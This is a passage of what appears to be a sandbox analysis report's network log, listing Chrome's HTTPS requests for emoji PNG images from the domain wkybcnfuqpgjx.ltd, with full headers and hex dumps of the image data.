                                  Data Ascii: RMHCGBGBYVIDGBFAE@C=[YE@D?QMC>E@WTC>HCA<>9?:?:QMGC@<=8KH82<7;6:5>:71942-?;72B>725083-'4/:6/*2-3.954/0+)#0+3/.)*%-(4/74-(+&*%-)*%2."(#)$51'"*%'"-(&!0,$41$ #$""#&"
                                  2025-01-12 00:04:04 UTC1369INData Raw: 5a a0 41 49 ad c2 0a 58 db 1b 02 81 1a 6f 13 ae a2 21 09 12 a5 c1 02 10 1c b6 0b 6c 61 7d a0 54 52 2e 75 32 e4 97 80 64 0a ce 81 d6 de 1c 88 07 6b b1 50 25 a0 03 ab 6d 74 60 5b a0 07 a0 8e b6 f5 3e 87 d1 21 5b 07 c4 28 32 14 4a dc 16 e8 6d f4 11 81 50 45 b1 23 ca 9a c8 23 fa 48 c0 1a d6 03 1d 00 9b 81 88 db 01 3d e9 8e 4d 3e 56 40 cb 65 a0 e3 22 b0 e9 d3 2e 01 39 13 2e 6f 8a a5 30 01 51 17 80 b6 5e 01 a7 f2 06 40 0b 2d d0 db 4b c0 e4 4b c0 78 86 47 5b d3 b5 b5 40 0c a9 84 2d 90 2c 02 c9 14 0a 44 0b 94 a3 9b 00 3d e7 15 74 76 05 74 01 1a 7a 40 20 01 3b b4 00 29 d9 7a 20 a2 05 22 e2 12 df 12 68 49 40 3c 1b 80 96 e0 f0 ae 67 eb 03 25 59 07 88 8a c0 1b 57 70 e5 6b 81 de 82 c5 45 22 ae 03 6c a2 3e 24 60 6b eb 02 05 5a 9a 8b 40 f4 65 20 22 55 f0 f6 40 47 04 3a
                                  Data Ascii: ZAIXo!la}TR.u2dkP%mt`[>![(2JmPE##H=M>V@e".9.o0Q^@-KKxG[@-,D=tvtz@ ;)z "hI@<g%YWpkE"l>$`kZ@e "U@G:
                                  2025-01-12 00:04:04 UTC918INData Raw: fa 14 c8 91 a0 de dd d9 b9 07 1c 2f 65 f3 7e 9f a4 6b 6b 81 21 bb 66 ea a3 3f 54 b1 19 98 2e a2 2b 32 03 29 47 3b 47 c0 e9 69 53 f4 db 10 74 9a 89 dd 67 36 57 03 a5 be dd 58 4a a7 4f 42 68 fb 24 eb db 10 dd 66 62 7f 95 5b 60 7f b0 47 11 07 7b be 39 30 70 25 90 c0 ba 6e a7 a0 1f 75 c5 e4 91 22 cd 6e b5 40 ca 5b 00 b1 67 c0 f5 ad b0 f5 40 ef ba 32 52 7a c0 d5 f4 5b 26 b9 30 5c 56 63 6f 06 8c 28 fc c6 66 62 02 76 67 16 5a 57 67 b8 ac 3f 9e a7 e9 8c e7 dd 12 d8 69 68 f7 80 a2 3b b3 e0 fa 36 ba e3 79 9d 01 47 c9 fa f1 bc db 37 b4 1d d8 04 24 ac 86 3e 2e 01 a1 01 ae 00 de 70 44 f4 56 40 ac 25 01 d9 30 54 91 6c eb 81 66 fd 0c 6b 46 ce ed 67 58 fb 40 1c 1b 80 97 26 8f fa b6 94 2b c6 94 35 7d 20 f3 cd 40 fc b5 63 29 6b 27 8f 92 ae b9 ec ba 12 a8 0d e7 40 2d 41 45
                                  Data Ascii: /e~kk!f?T.+2)G;GiStg6WXJOBh$fb[`G{90p%nu"n@[g@2Rz[&0\Vco(fbvgZWg?ih;6yG7$>.pDV@%0TlfkFgX@&+5} @c)k'@-AE


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  130192.168.2.650083172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC608OUTGET /img-apple-160/1f1e7-1f1ea.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC898INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 3139
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-c43"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rExXpHPFt%2BRV6abKWra2XjVdIQZLuH4AqAKEwYwxVMSfnNmbnhsAPyLcDXLP%2FMg6hfxWRL7S5Hk4E284khT0eYNj0k%2BDfU4TDjZ48NhxQbJIIBHAhVO4XVlhIkmKnc5yJyY%2FSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3156e058c83-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1803&rtt_var=901&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4226&recv_bytes=1186&delivery_rate=247562&cwnd=189&unsent_bytes=0&cid=8c3151e729aac212&ts=654&x=0"
                                  2025-01-12 00:04:04 UTC471INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 81 61 41 cf c7 82 59 35 2e cf c6 81 9c 6b 5c 66 0f 15 81 6c 47 4f 0a 11 c3 66 6e 6f 6b 4f ce c6 81 65 0b 12 84 7a 2a 07 07 07 79 13 17 c2 61 68 5b 5b 5b a6 1d 28 cf c7 82 04 04 04 c6 6b 71 82 78 2a c0 52 5a 60 60 60 7a 0f 16 0a 0a 0a c3 67 6e 00 00 00 ce c6 81 2c 2c 2c c4 68 6f 09 09 08 cf c7 82 77 0d 16 84 7a 2b 63 63 63 04 04 07 c3 64 6b 52 52 52 78 0e 16 ce c5 80 65 65 65 07 07 07 84 7a 2b cf c9 82 cf c7 82 07 07 07 64 64 64 80 13 1b 05 05 05 c3 67 6e 83 7a 2a 63 63 63 0d 0d 0d ce c5 80 77 0d 16 ca 6e 75 84 7b 2b 2f 2f 2f 08 08 08 cf c7 82 60 61 62 cd c4 7f c0 61 68 01 01 01 78 0d 15 84 7a 2a fc f3 52 ff f0 4e ff ec 54 ff
                                  Data Ascii: PNGIHDRPLTEGpLaAY5.k\flGOfnokOez*yah[[[(kqx*RZ```zgn,,,howz+cccdkRRRxeeez+dddgnz*cccwnu{+///`abahxz*RNT
                                  2025-01-12 00:04:04 UTC1369INData Raw: 2b 3b cd 3e 49 ec 2f 3f da 37 42 bb 44 4c f5 2a 39 68 68 65 f5 27 37 f1 28 38 cc 39 34 f2 25 35 ee 25 34 cb 34 3f ef 23 32 e8 26 34 f9 1c 3a d2 2f 3c dd 2a 38 ed 22 31 60 60 60 f4 1b 39 b7 38 42 ec 1f 2e e9 20 2e e9 1c 2c 5b 5b 5b e4 1e 2d e0 20 2d b6 33 35 e2 1e 2c e6 1c 2b d4 24 31 da 20 2e e7 1a 2a de 1e 2d b7 2e 38 e1 1b 2a e5 19 28 d7 1f 2d dd 1b 29 e2 18 27 56 56 56 cf 20 2e cc 20 2e e2 16 26 de 17 26 e0 15 24 d3 19 27 d9 16 24 df 13 22 dc 14 23 51 51 50 dd 12 21 da 13 22 aa 28 2d bc 1f 2b db 11 20 c7 19 27 d5 13 21 d9 11 1f d9 0e 1e d5 0f 1e d7 0e 1d d7 0d 1c d5 0d 1b 4a 4a 4a d3 0d 1c ab 1e 27 ce 0e 1d d1 0c 1b a7 1e 29 b9 15 22 c5 0e 1c 43 43 43 9d 19 23 b6 0d 1a a8 10 1b 3d 3d 3c 8c 1a 21 a0 0c 18 91 11 1b 36 36 35 83 13 1c 8b 0a 14 7c 0f 17 2f
                                  Data Ascii: +;>I/?7BDL*9hhe'7(894%5%44?#2&4:/<*8"1```98B. .,[[[- -35,+$1 .*-.8*(-)'VVV . .&&$'$"#QQP!"(-+ '!JJJ')"CCC#==<!665|/
                                  2025-01-12 00:04:04 UTC1299INData Raw: b0 6d 00 bc 0c 03 d4 df 1a 42 00 ee 88 1d 93 55 b5 13 23 15 5a 96 d9 0d 67 04 1b 81 83 08 14 d6 6a e6 b0 17 61 16 9a 1d 4c 33 a2 ef 26 8a 45 87 79 a0 f7 3c 1c 37 7d c1 3e 01 35 c3 eb 6e 98 2e d3 49 b7 7e e5 f5 cf f7 29 5c c2 1c 68 b9 5e 18 41 b2 31 00 89 f6 c0 8a 0e fc 7d 1b 06 4c 23 5b a5 20 0a 79 97 af 3a 03 64 3b 9a d2 e8 74 f5 29 28 bb 1f 9a 8e eb b1 f4 a2 79 b3 a0 b1 69 fb c8 4c f4 a7 10 17 70 e5 32 05 ae c7 98 4a 23 24 c9 34 b4 e7 74 bd 8e 50 a1 e1 c7 75 16 24 a5 c8 33 71 eb 8b cc d4 e3 85 1c 77 16 cc c4 e4 e5 9c ce c0 e6 05 bd 19 d3 48 81 91 8f c4 ae c0 81 da c1 3d 53 6c 4d 24 f0 cf 6e 39 3c 26 82 06 9c f8 16 37 c8 4a e5 80 e3 f1 dd 2d e5 97 ef 2c c6 6f cf ed 0f 0a 92 33 cc c3 4b 1a 98 69 c4 94 08 fa 24 d7 4f 92 71 2f 41 99 33 e4 b5 ab c3 4f ec b0
                                  Data Ascii: mBU#ZgjaL3&Ey<7}>5n.I~)\h^A1}L#[ y:d;t)(yiLp2J#$4tPu$3qwH=SlM$n9<&7J-,o3Ki$Oq/A3O


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  131192.168.2.650089172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC608OUTGET /img-apple-160/1f1e7-1f1ff.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 6640
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-19f0"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXa5q7vncSmwCCzayY2AGnPhniKkjrFExlwPhg3PGBxhizpxT788DRGWAdDReXTXWcx9cUCVqT29Ytrl3%2BVnhuH1CsQOkprw3ogkttvJffv5qe7m00ie0YiOAxBxQwK1%2B2BtQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3162fd6de92-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1510&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1186&delivery_rate=1933774&cwnd=240&unsent_bytes=0&cid=14db58750f1418a4&ts=627&x=0"
                                  2025-01-12 00:04:04 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 17 39 63 02 23 4c ad 62 6a b5 6c 74 bb 71 79 79 1c 26 b6 6c 74 b3 6a 72 6e 12 1b 66 12 1b 97 3d 4f b6 6d 75 6d 18 20 67 13 1b b7 6e 76 b9 70 78 66 11 1a 68 14 1c 66 12 1a b2 6a 71 64 10 19 69 16 1f 62 0e 17 b0 67 6f 67 13 1d b0 65 6d 90 34 3d ff ff ff 00 34 6f 0e 42 7e 00 34 71 06 3a 76 03 37 74 08 3c 78 13 48 85 0b 3f 7b 03 37 72 12 46 83 0b 40 7d 02 35 72 05 38 74 0e 43 80 09 3d 7a 18 4c 88 0a 3e 7b 07 3b 76 0d 41 7e 15 4a 86 10 45 82 15 4b 88 1b 4f 8c 13 49 85 1f 53 90 1a 4e 8a 02 35 70 1d 51 8d 06 3b 79 10 44 80 0b 47 86 15 3a 63 00 33 6d 25 59 94 22 56 91 f9 f9 f9 16 43 76 60 09 13 15 3e 6d 15 45 7d 01 31 68 04 39 76 01
                                  Data Ascii: PNGIHDRPLTEGpL9c#Lbjltqyy&ltjrnf=Omum gnvpxfhfjqdibgogem4=4oB~4q:v7t<xH?{7rF@}5r8tC=zL>{;vA~JEKOISN5pQ;yDG:c3m%Y"VCv`>mE}1h9v
                                  2025-01-12 00:04:04 UTC1369INData Raw: a5 d3 a8 2a 5b 93 ab 3f 4b aa 2f 3d 7b 50 3e 92 76 65 49 a6 27 17 8d 1c 31 9c 3a 41 69 22 59 71 45 89 89 88 78 7a 7e ca db ca 52 78 a6 65 ab 5a 4e a7 4d 8f 31 44 6e 44 29 4e 96 3f 29 67 15 61 84 ad 3c 1e 1b 7b 62 50 9d 88 72 4b 5a 23 2b 59 0f e4 dc dc 33 76 1f b6 56 60 a0 b9 d2 78 37 54 c8 d3 e0 8c a7 c4 85 4f 6c b7 c5 d7 97 19 23 0f 66 04 52 32 29 95 ca 96 33 2c 55 5b 2a 49 5c 4e 28 75 b3 76 75 99 6e bc a1 9c b5 d7 b7 6f 87 61 c8 e8 cb 49 48 18 92 bc 8f 48 b3 24 57 56 54 73 91 b5 e5 f5 e8 cd ae 4b d6 dd e7 7d c2 7f 92 68 50 7d 9c c3 c7 b2 a8 d4 bf bf 8f 7b 85 2d 47 77 e5 c0 4d 2b 4c 0e 4f 87 48 b1 94 89 60 41 60 f4 e7 ed 77 73 4e 76 2d 2b 65 35 31 ee fc f4 3c 38 0f b3 8a 3f 42 39 61 42 0b 08 3b 4d 7b 47 40 3e fd dc 56 5e 37 5b 4d 5b 8b 67 ba 64 ba f3 ff
                                  Data Ascii: *[?K/={P>veI'1:Ai"YqExz~RxeZNM1DnD)N?)ga<{bPrKZ#+Y3vV`x7TOl#fR2)3,U[*I\N(uvunoaIHH$WVTsK}hP}{-GwM+LOH`A`wsNv-+e51<8?B9aB;M{G@>V^7[M[gd
                                  2025-01-12 00:04:04 UTC1369INData Raw: 8d a6 d0 90 29 21 f8 6e a3 fc d7 51 44 c2 b0 ae 1a 34 3a ec 56 cb c4 01 84 cd cb 83 4f c7 54 5a 10 fe 7b 40 10 02 11 19 13 84 42 19 9f 9f 96 02 4e 28 19 42 56 92 ab 42 44 1a 18 43 74 03 4f 07 03 2c 9c b0 77 1c 3d 73 7c 7a 7a e0 6c e9 cc 6f e7 30 14 8c 71 b4 99 08 32 c1 38 00 42 ea f5 4f 10 01 91 10 11 a5 42 84 94 f1 d3 a0 d8 d8 d8 98 54 0a e9 05 e2 1a 23 7e 1e 23 2b ba 77 fc 66 67 fb 65 03 64 b2 0e d9 ff b4 4e 2f f6 4c e8 60 8c 58 79 b7 51 89 fb 03 b7 6f 18 08 3e 0a 48 0b 61 8e 6b 00 f1 54 63 3f 3a d5 ae 96 83 d7 3c 06 83 d5 3a d8 7e d3 64 32 59 66 af b4 0f 56 1a 0c 67 4b a7 c8 a7 32 bf df a8 c1 d7 04 7e b4 0c 14 ca e2 d7 73 c4 22 5f a0 98 02 a6 04 02 12 da 31 f4 ec 5d b7 db 87 0c 26 8b c5 60 1d 2c f5 78 06 a6 a7 4f f5 b9 e0 7f eb 29 7b df ef 3a f2 98 41
                                  Data Ascii: )!nQD4:VOTZ{@BN(BVBDCtO,w=s|zzlo0q28BOBT#~#+wfgedN/L`XyQo>HakTc?:<:~d2YfVgK2~s"_1]&`,xO){:A
                                  2025-01-12 00:04:04 UTC1369INData Raw: c0 e0 6f 9f 3f df 7f fa 7c 65 ca ca 26 5e ec f3 f1 7c 5b 9b 66 04 18 b4 21 5f bb 12 e0 6f de 1d 41 14 40 6c 6c 96 32 cd c7 d5 d5 9b 9b be 70 9c 06 81 d7 3b ba 2d 96 a2 af 79 a5 cd ed 8b 79 40 34 3d 7f fa f4 a9 b6 b0 9a 60 b9 19 d2 3e 14 30 fa e7 17 81 41 93 f0 ce 15 00 7f 7a 01 f0 93 3b 9d 80 c1 14 6b 9a df 01 02 03 b0 37 a7 5e 4c 19 38 11 8b a1 ad b8 58 4c f7 a0 19 68 f1 8f d9 4d cf f7 9f 3f 5f 4d 91 a6 4d 03 ae 07 50 2d af b3 53 80 e3 13 1f d7 5f 29 f0 c7 15 e0 cd 6f 03 eb 5a 10 cb 40 52 eb 6e 07 5e 49 cf cf 36 8f 37 36 8e 5e 4d f4 3a 7d 66 f7 fc 72 39 b8 83 b6 bd b8 7a 96 dd 5f 5d 7d be ba b5 ba b9 c5 54 cf fc 19 96 6c 1e c0 c0 f1 b0 e1 ea 80 1f 9c 02 bf 5f 05 be 5e 06 1b 1f 03 80 97 65 7b d6 00 24 de bb a9 dd 98 1b df de 3e ec 73 9a 9d 31 fe f3 95 e6
                                  Data Ascii: o?|e&^|[f!_oA@ll2p;-yy@4=`>0Az;k7^L8XLhM?_MMP-S_)oZ@Rn^I676^M:}fr9z_]}Tl_^e{$>s1
                                  2025-01-12 00:04:04 UTC1369INData Raw: c5 b6 cf 36 73 6b 00 d1 04 4a 11 00 5c f7 b0 fe fe 45 ef 83 57 75 9a 59 64 49 da 0e 78 05 28 d9 05 4e e2 31 be e4 6c 9d 3e 68 f9 c7 5f 6e 7c 7c fb f6 af ff f2 d2 1d 2c 04 dd 96 62 31 98 9a 8f a9 d7 76 da 28 9a b2 57 b7 91 5b b7 6a 0b bc dd 38 8a 80 b3 e8 40 ed 9c ac a4 31 64 f5 18 bf d0 07 4c c9 6c 7e 79 e3 0f 9f 3e 44 2f ac be 7f 07 83 45 1f ba 23 5b dc 4e 8b 31 ce 80 27 4f d3 6c 06 08 42 85 5e d1 cf 3f 01 d7 00 d8 a4 c2 88 a5 36 4d 6b 6b 3e 06 04 3e c6 e9 ed bc 66 c1 30 9b 0e 25 73 2f 17 fe 5d 1d c9 20 d2 ed c4 42 a1 f0 e0 42 37 03 30 99 a7 a9 66 49 ad 82 8e ba 5b f7 6b 0d ac bf 35 81 ab 98 80 8d da ef 73 ea 00 ba 73 4b fa 27 4e 77 f3 d4 46 3a 57 cc 05 7d c5 d8 c9 c9 f0 bc b9 b8 10 72 71 9c 2c 11 2e 00 50 c7 f2 5a ed 60 37 01 aa 07 0d bf f8 6e 19 e2 8a
                                  Data Ascii: 6skJ\EWuYdIx(N1l>h_n||,b1v(W[j8@1dLl~y>D/E#[N1'OlB^?6Mkk>>f0%s/] BB70fI[k5ssK'NwF:W}rq,.PZ`7n
                                  2025-01-12 00:04:04 UTC691INData Raw: b0 32 8b e4 aa ab 07 bf 29 42 49 5e 18 a4 1b 1a 55 a2 5e 05 8d c6 f0 f0 f0 b9 3e 68 32 c1 c3 9d 05 e3 7f 0d 97 79 d3 6f a9 43 f9 81 95 a5 c9 5e 0f d7 16 16 9f 24 f4 7e 32 23 b7 5b 04 de 45 d6 37 37 e9 de 48 a1 60 db 25 87 e9 69 cb b2 4c 4d ab d7 ab 08 20 a3 20 10 1c 84 e0 ae e3 79 6e 44 54 c9 67 66 58 78 7a 62 62 62 f2 ce c7 a5 c5 f9 7b 09 c4 dc e0 c6 d4 52 e9 8d 9f 08 13 3f 7b f6 d0 b6 c7 c7 c7 4b b6 5d 01 56 c5 72 98 e6 58 aa 5a af 36 0e 22 25 7d be 83 60 bc eb 80 23 04 41 3a a9 eb 4a 6a 66 86 e2 e7 a9 64 5e 57 d2 dc 0d 6a 14 c7 1e 27 6c db 2e 14 0a 86 61 98 40 33 cb 5a b9 3c e6 52 06 30 2d 95 2a 46 ed c7 f9 c3 9d 2b c8 0c bb 15 64 27 2c d1 af 24 71 3c 11 6a e5 65 83 1b 53 23 31 47 4d 55 35 a2 08 c0 50 71 68 1b ae 69 59 cc b1 da 68 fd d2 74 99 0b 32 43
                                  Data Ascii: 2)BI^U^>h2yoC^$~2#[E77H`%iLM ynDTgfXxzbbb{R?{K]VrXZ6"%}`#A:Jjfd^Wj'l.a@3Z<R0-*F+d',$q<jeS#1GMU5PqhiYht2C


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  132192.168.2.650090172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC370OUTGET /img-apple-160/1f1e7-1f1ed.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC903INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4149
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-1035"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2FCiTKDhagGJ%2FNwNSRnl6wu%2BNlaORcmc9IDtoPSjBqOibHSsO%2BkKuMgpqukhEXA6OwTc01WUWq9vA%2FiO2M5lIYF7iwxpmoSlyb1nHLO8ifEwLDMGCGr3Pkr%2BXGbnBDuc15plJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3163ccc7c99-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=691&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1582655&cwnd=235&unsent_bytes=0&cid=f1e2382df7d6baaa&ts=147&x=0"
                                  2025-01-12 00:04:04 UTC466INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 7c 32 3a b4 7f 84 67 16 1f be be be a9 66 6d 68 14 1c 79 7a 7a 68 14 1d b8 6f 77 c4 c4 c4 68 14 1d 77 78 77 b5 6c 73 6f 1a 23 79 79 79 c0 c1 c1 b9 70 78 8b 1f 2c 99 2e 3a 6a 15 1e 75 75 75 c0 b3 b4 af 66 6d 6a 16 1f 9c 9c 9c 92 92 92 80 80 80 a4 a4 a4 b3 6b 72 67 13 1c bf bf bf 76 76 76 bb 73 7b 6b 17 20 c4 c4 c4 ad 61 69 68 12 1b 78 78 78 6e 19 23 bc 72 7a c5 c5 c5 68 12 1b 77 77 77 b2 67 6f 6b 1a 22 c5 c5 c5 6b 17 20 bc 72 7a b5 b5 b5 af 62 6a b3 a6 a7 b9 70 78 62 0f 18 73 72 72 fc ff ff f6 ff ff f1 ff ff f2 fb fa f6 f6 f6 f4 f4 f4 ed f7 f6 f2 f2 f2 f0 f0 f0 ef ee ee ed ed ed ed ec ec ec eb eb ea ea ea e9 e9 e9 e8 e8 e8 f0
                                  Data Ascii: PNGIHDRPLTEGpL|2:gfmhyzzhowhwxwlso#yyypx,.:juuufmjkrgvvvs{k aihxxxn#rzhwwwgok"k rzbjpxbsrr
                                  2025-01-12 00:04:04 UTC1369INData Raw: 7c bf 5d 68 ad 62 6a c3 58 63 cd 4f 5c c6 52 5e 76 76 76 b5 57 61 a9 59 62 cc 49 57 ce 44 52 c0 48 55 b4 4d 58 a8 52 5b ce 3f 4e 82 5d 61 a9 4b 55 ce 3a 4a c1 40 4d d5 34 45 d4 34 45 b5 42 4e d3 34 44 ce 36 46 d4 33 44 d2 33 44 d2 33 43 d1 33 44 d3 32 43 d0 33 43 d2 32 42 cf 33 43 d2 31 42 d1 30 41 ce 31 42 ce 30 41 ac 3f 4b cf 2f 40 b9 39 46 cf 2e 3f c1 34 43 c8 30 40 cc 2e 3f ce 2c 3d cb 2c 3d cd 2a 3b ca 2b 3c c8 2b 3c c0 2e 3d ca 29 3a b0 33 40 c8 28 39 c6 28 39 c7 26 37 9c 38 42 cb 22 34 b7 2b 3a c4 25 36 c3 23 34 b9 26 35 c6 1f 31 c1 21 32 ae 29 37 c0 1f 30 c7 1a 2c b9 20 30 bf 1d 2e bc 1e 2e b5 21 30 a4 28 35 b2 21 30 bc 1b 2c b7 1d 2d ab 22 31 b9 1a 2b c7 12 25 c2 14 26 b6 19 2a 9a 25 32 b8 17 28 a4 20 2e 9c 22 2e b5 16 27 b2 17 28 b5 15 26 ac 19
                                  Data Ascii: |]hbjXcO\R^vvvWaYbIWDRHUMXR[?N]aKU:J@M4E4EBN4D6F3D3D3C3D2C3C2B3C1B0A1B0A?K/@9F.?4C0@.?,=,=*;+<+<.=):3@(9(9&78B"4+:%6#4&51!2)70, 0..!0(5!0,-"1+%&*%2( .".'(&
                                  2025-01-12 00:04:04 UTC1369INData Raw: 1d 70 29 ab d6 93 bf fb d0 c5 8f 55 92 90 8d 74 b3 e0 a6 34 21 c3 ca 71 b1 9b 14 74 77 03 1c 70 37 12 ee 52 95 f2 c4 99 17 2e bd 1b 35 39 34 b8 8d 5f 55 53 61 8b 1a 00 a2 4e 24 e8 c3 1a d9 4e 74 17 ef f1 c8 c3 7f b6 fc 41 c5 36 cc c6 b9 39 61 87 a7 27 43 aa c9 22 68 0e 18 0e 38 60 49 17 a2 23 fd fa 8e b3 bf 7f e7 87 25 24 1c 61 34 11 c9 82 25 3b 1a 9a 22 36 49 0e 3a 78 da 34 c7 86 25 3c ec 3d 32 28 8b ef bf f8 1b 6f 7f 40 5e 11 c1 a0 62 b4 d8 48 92 a3 73 03 61 4c 04 93 1f 38 80 93 a8 fa f2 f8 99 17 96 5f 07 47 e3 8e e3 27 70 93 3a 63 04 46 23 d9 e8 36 e8 6c 43 aa 15 1e fd ce 4b 5c 2c 11 87 a4 62 f8 58 37 37 dd e8 33 8d 91 dc 31 81 f9 04 45 02 e0 5b 61 34 67 50 3c 7e fc c5 b9 cb 35 79 e5 6c 60 e2 8c 73 33 50 87 c9 b1 00 8c 16 b4 61 89 38 d8 30 19 1d a0 9e
                                  Data Ascii: p)Ut4!qtwp7R.594_USaN$NtA69a'C"h8`I#%$a4%;"6I:x4%<=2(o@^bHsaL8_G'p:cF#6lCK\,bX7731E[a4gP<~5yl`s3Pa80
                                  2025-01-12 00:04:04 UTC945INData Raw: 95 3c fd 9d e7 af bc 9b 06 4c 14 1b a9 a6 23 64 09 c3 15 4e 02 13 0b a6 10 aa 6d 7f 97 d8 67 7d 68 5d 7e bf d6 e1 fe 60 a3 dd c6 12 82 b2 45 51 86 08 61 9c a0 da 56 ab 56 db 2a 0f 35 0f 44 7a fe d0 83 7f c1 c5 52 73 c7 48 08 8e 36 4a 1a ba 73 71 ad 45 a0 00 50 68 4c ab 31 11 54 43 5c 1c 8d 46 2a 62 a9 fa 77 3c fa e2 dd 9f f5 72 20 91 33 a0 c1 4d 31 4d bb a4 85 07 00 94 8c 16 79 81 42 1b 68 91 0c f3 72 b2 25 4e 95 2b 6a 82 83 a0 91 de 81 1f fe e5 c1 cb 9f 90 03 08 26 21 a2 d6 e8 96 de 02 00 2d bc 10 97 2e d0 85 30 0b b4 e9 ec 68 45 a8 4d 28 88 b8 80 38 29 f8 e2 aa bd 7f 38 7d 6a 6e f9 aa e3 e3 e6 bf a4 36 7c 6d 13 08 5d 68 c1 01 e8 f6 ba 3d 0d 40 a2 a2 cd 9a 76 7b 46 6b a4 a0 40 ea 34 6a 88 46 d2 b0 d0 5d fb 57 4e 6c dc d6 33 a8 76 9c 29 86 a8 0d 6a 2d 80
                                  Data Ascii: <L#dNmg}h]~`EQaVV*5DzRsH6JsqEPhL1TC\F*bw<r 3M1MyBhr%N+j&!-.0hEM(8)8}jn6|m]h=@v{Fk@4jF]WNl3v)j-


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
